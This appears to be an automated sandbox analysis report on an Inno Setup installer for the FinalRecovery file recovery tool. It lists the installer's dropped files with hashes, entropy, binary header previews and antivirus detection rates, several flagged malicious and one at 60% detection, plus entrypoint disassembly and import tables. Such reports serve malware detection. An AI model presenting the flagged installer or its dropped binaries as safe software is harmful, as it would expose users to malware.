              Preview:ITSF....`.......&..u.......|.{.......".....|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1949
              Entropy (8bit):4.915453283427292
              Encrypted:false
              SSDEEP:48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
              MD5:C0AE85DB30FE9027DBBF3BA758FA78BE
              SHA1:95E69DB95504A9F61D090690F32FB5D2F685C604
              SHA-256:CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
              SHA-512:DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
              Malicious:false
              Preview:.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:data
              Category:dropped
              Size (bytes):1327103
              Entropy (8bit):6.349642071497365
              Encrypted:false
              SSDEEP:24576:O8sn21M2uJJKYcbmuBm/GAihHJTo+M/FLUTTb2ghAfrZLya6p4ZyQzAp:dsroY6mGAugUlgIbn
              MD5:686E27330B438E55788EE0A132194478
              SHA1:19AB1A4D5724A647984EDBBDAC465E98F7093B2F
              SHA-256:5D07E971A265774EE4C2ACF51CC41C815D247284C1A69AD05298FD54A7285FCF
              SHA-512:B54D7258AFEB1243445A7E344655D6A050E8F5F44FEBAFF3C5D62D6CEFBC49F948CD35A549D0AFD654310CA3E50951C23863007F94BF944C0957496C4DE96AA6
              Malicious:false
              Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):791040
              Entropy (8bit):6.608982798504157
              Encrypted:false
              SSDEEP:24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
              MD5:5C2FE7D4DDE65810152054F3C93C1815
              SHA1:2A19F3FAA78A5072068F7902DB19A248F11FA69B
              SHA-256:233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              SHA-512:2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):723230
              Entropy (8bit):6.49191904892708
              Encrypted:false
              SSDEEP:12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
              MD5:D0E4493CD1CEC1B97F24BAB12A942543
              SHA1:CEE352F43F982FCB36A337D2C15FFDD28B04B80D
              SHA-256:C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
              SHA-512:D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
              Malicious:true
              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:InnoSetup Log FgasoftFR FinalRecovery, version 0x30, 4340 bytes, 585948\user, "C:\Program Files (x86)\FgasoftFR\FinalRecovery"
              Category:dropped
              Size (bytes):4340
              Entropy (8bit):4.712609745266559
              Encrypted:false
              SSDEEP:96:AyWx5pJU+oIahqwOIhdc87ICSss/LBtbgfj1:AyWx5pJU+KEIhZICSsATgfJ
              MD5:15CF1A53B3514856C721F859E721DCBD
              SHA1:9BC828AC64112060DB3059F8EEC43722BE1AB041
              SHA-256:87159F502A66551DA4E65C05DB04E132CBC46B1D4370EEC9022499FBEAD59A84
              SHA-512:C49D7B0D200BC65FA055302353FAC99BBD379D81EF0D220411A379006D4A6A3AA716D36F0E9E2B1BD2AFD699941F5547E371AFB277B99800CFB290A379C5DB99
              Malicious:false
              Preview:Inno Setup Uninstall Log (b)....................................FgasoftFR FinalRecovery.........................................................................................................FgasoftFR FinalRecovery.........................................................................................................0...........%.................................................................................................................Wc(.......y.s.......N....585948.user.C:\Program Files (x86)\FgasoftFR\FinalRecovery.............:.Z.. ..........b.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):723230
              Entropy (8bit):6.49191904892708
              Encrypted:false
              SSDEEP:12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
              MD5:D0E4493CD1CEC1B97F24BAB12A942543
              SHA1:CEE352F43F982FCB36A337D2C15FFDD28B04B80D
              SHA-256:C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
              SHA-512:D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
              Malicious:true
              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:data
              Category:dropped
              Size (bytes):95248
              Entropy (8bit):7.998277474001343
              Encrypted:true
              SSDEEP:1536:1ajIVNDkCngyeaL3ZC7cjgn35QgjaeiPr6idOZAkOLfTRCaLQhAboaAkepTXnkY5:1vVpj3ZC72gnJQg2eikik4FC9/RX+f6
              MD5:636E3CA21F2541B5EE3AB9922A183C79
              SHA1:4B98C5432E534AF5FA17424C907E61CCFA6880D9
              SHA-256:9B97BF40465ACFBAB5D61EE45ECAC1E485A988ADC66E1A859F950605DC5677B9
              SHA-512:6AA99DFAB439063332383EBA737F34A5929353794245E8E4469EAEB2F7055889891D5A3F3CD3C9F20E37DCDEBFA78C5B5749F3BFDF40263970C880F047A0BDBB
              Malicious:false
              Preview:..'m..h.f{Q{..7_....l../....3`.p.$.....]....~@..Vt.%..eB.9a../_...G...|.O..0HG`......`... k..x#.).....W..n...;.vmN....T..:l...........37r.../..X.1,..)..^.Y....N.{8........=..R..E.z.c..G.~X.0.}.b....rE..d...........(...M`.O.Y....?....D...R....N...C.{..E.\i.......:.h...#..\...d...*O.."..N.yw.2.$..L.{....[w\....v.....zm....9.|.q...p....j.WfQ.5h^rY.r.-..^}g.......]%...El.98Q..5F).F...).KBD..<0..l7...:..!.....L..P.l..oV....h..~;.G..K....-..={.....U.%...~.(.DE..8..df./...n...FC....~#.`.a........B.r..OJ^-...$.(`...N..*k....P..h.....+.o...W.m.0...&j...E...Sip..p...U..Qx...q.[.."......U..n|.Me_...PT.|c.wt....5l...'..f..6n..,.+....4*....J.\..+..\..C...:1.u..l.h...n.6..5P.-/........m70D..D._....?..9.*V...M8..m.T.]4.i.IQN....BV..."h.......f......V.(..W..H.`,.V`..l.;...}.@.......*..rD....6OP.OC#^......=^7.R...tx..Q<..J..o.n..q.O..f.F....).Y2v..I...g.lnV.X..sm.>....^eO.l.....EB...u.m.E.|.X...)b 7.K.ma."..%t..p.....U\.....L..A.:._.@...c3..[.m...
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):21
              Entropy (8bit):3.975418017913833
              Encrypted:false
              SSDEEP:3:iIxcsJE:iyE
              MD5:C0236A8F8EB0411CC373CD432E252990
              SHA1:49CA519830FADD97FA7BFB7C3404ED2DB29DF4E0
              SHA-256:375CD2A305050C0ECDC8EF9A417194DB2955F3C99B04C76F1B2CD5A88369A242
              SHA-512:3EDFDF13D9AE53C3DC77B299137C7F318B689F4880D72E50CF037F5A4F5C2A6CBC24CB5FE557C10F458CD1658B65E27EF994794FAB2D8E1562694E7DE5039E7E
              Malicious:false
              Preview:kvQoRqtcCyMtHmQyQXOUu
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):4.026670007889822
              Encrypted:false
              SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
              MD5:0EE914C6F0BB93996C75941E1AD629C6
              SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
              SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
              SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):2560
              Entropy (8bit):2.8818118453929262
              Encrypted:false
              SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
              MD5:A69559718AB506675E907FE49DEB71E9
              SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
              SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
              SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):6144
              Entropy (8bit):4.215994423157539
              Encrypted:false
              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
              MD5:4FF75F505FDDCC6A9AE62216446205D9
              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):23312
              Entropy (8bit):4.596242908851566
              Encrypted:false
              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\file.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):712704
              Entropy (8bit):6.4837542632664515
              Encrypted:false
              SSDEEP:12288:9QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kS0:+tCUA4arPEn37TzH7A6nw9yzeESUFWH/
              MD5:D76329B30DB65F61D55B20F36B56DA26
              SHA1:5E4C77B723AE8F05B3AE6AFEEE735A4355F00663
              SHA-256:229FBCB11EE7D1F082B6411610E95F726EEC4E6737E6B6392719DF4F0FE3FA1D
              SHA-512:A291AED0897315E88B6378B1DB10ADA05BDA8C1ECCAF73DE23F409FE61860EBD1DBB422063E00996584D3B4B100122931D5BBAB54A88951706D75EFCC660F70D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 2%
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):73728
              Entropy (8bit):6.20389308045717
              Encrypted:false
              SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
              MD5:3FB36CB0B7172E5298D2992D42984D06
              SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
              SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
              SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 60%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.992737502830512
              TrID:
              • Win32 Executable (generic) a (10002005/4) 98.86%
              • Inno Setup installer (109748/4) 1.08%
              • Win16/32 Executable Delphi generic (2074/23) 0.02%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              File name:file.exe
              File size:1782938
              MD5:14e09c7a5842688842f6c0bf61c17135
              SHA1:4c9e1cbcd933293268c396b3c79f3836665059a8
              SHA256:a5ce2c21d3f92080a06e0aa7862303848b2661181b279a2db9b72b8f31a82702
              SHA512:291eba7114f626be1a02953267f4741adeb71593a75cbb8c65e74dc2783253fc94616ae73126dd2d7dd5eb273cebd6413d36a2a67fae66c1796e5b08c7344b15
              SSDEEP:49152:Zj8WUqIwpfvQvBkF9PPeaPhUMewEgjkdLCgv2MR:98WxIU+mzsv2MR
              TLSH:7885335282B1D4B9E293A77C3C33DD692ED3BA1961781024331E56CF1F277A2AC4E356
              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
              Icon Hash:a2a0b496b2caca72
              Entrypoint:0x409c18
              Entrypoint Section:CODE
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:1
              OS Version Minor:0
              File Version Major:1
              File Version Minor:0
              Subsystem Version Major:1
              Subsystem Version Minor:0
              Import Hash:884310b1928934402ea6fec1dbd3cf5e
              Instruction
              push ebp
              mov ebp, esp
              add esp, FFFFFFC4h
              push ebx
              push esi
              push edi
              xor eax, eax
              mov dword ptr [ebp-10h], eax
              mov dword ptr [ebp-24h], eax
              call 00007EFFD44E77E3h
              call 00007EFFD44E89EAh
              call 00007EFFD44E8C79h
              call 00007EFFD44EAC88h
              call 00007EFFD44EACCFh
              call 00007EFFD44ED5FEh
              call 00007EFFD44ED765h
              xor eax, eax
              push ebp
              push 0040A2D4h
              push dword ptr fs:[eax]
              mov dword ptr fs:[eax], esp
              xor edx, edx
              push ebp
              push 0040A29Dh
              push dword ptr fs:[edx]
              mov dword ptr fs:[edx], esp
              mov eax, dword ptr [0040C014h]
              call 00007EFFD44EE1CBh
              call 00007EFFD44EDDFEh
              lea edx, dword ptr [ebp-10h]
              xor eax, eax
              call 00007EFFD44EB2B8h
              mov edx, dword ptr [ebp-10h]
              mov eax, 0040CDE8h
              call 00007EFFD44E788Fh
              push 00000002h
              push 00000000h
              push 00000001h
              mov ecx, dword ptr [0040CDE8h]
              mov dl, 01h
              mov eax, 00407364h
              call 00007EFFD44EBB47h
              mov dword ptr [0040CDECh], eax
              xor edx, edx
              push ebp
              push 0040A255h
              push dword ptr fs:[edx]
              mov dword ptr fs:[edx], esp
              call 00007EFFD44EE23Bh
              mov dword ptr [0040CDF4h], eax
              mov eax, dword ptr [0040CDF4h]
              cmp dword ptr [eax+0Ch], 01h
              jne 00007EFFD44EE37Ah
              mov eax, dword ptr [0040CDF4h]
              mov edx, 00000028h
              call 00007EFFD44EBF48h
              mov edx, dword ptr [000000F4h]
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              CODE0x10000x933c0x9400False0.6138883023648649data6.557291120606636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              DATA0xb0000x24c0x400False0.3134765625data2.7679914923058866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              BSS0xc0000xe4c0x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0xd0000x9500xa00False0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0xe0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0xf0000x180x200False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .reloc0x100000x8b40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .rsrc0x110000x2c000x2c00False0.3243075284090909data4.467134664034375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands
              RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands
              RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands
              RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands
              RT_STRING0x125740x2f2data
              RT_STRING0x128680x30cdata
              RT_STRING0x12b740x2cedata
              RT_STRING0x12e440x68data
              RT_STRING0x12eac0xb4data
              RT_STRING0x12f600xaedata
              RT_RCDATA0x130100x2cdata
              RT_GROUP_ICON0x1303c0x3edataEnglishUnited States
              RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States
              RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
              DLLImport
              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
              user32.dllMessageBoxA
              oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
              kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
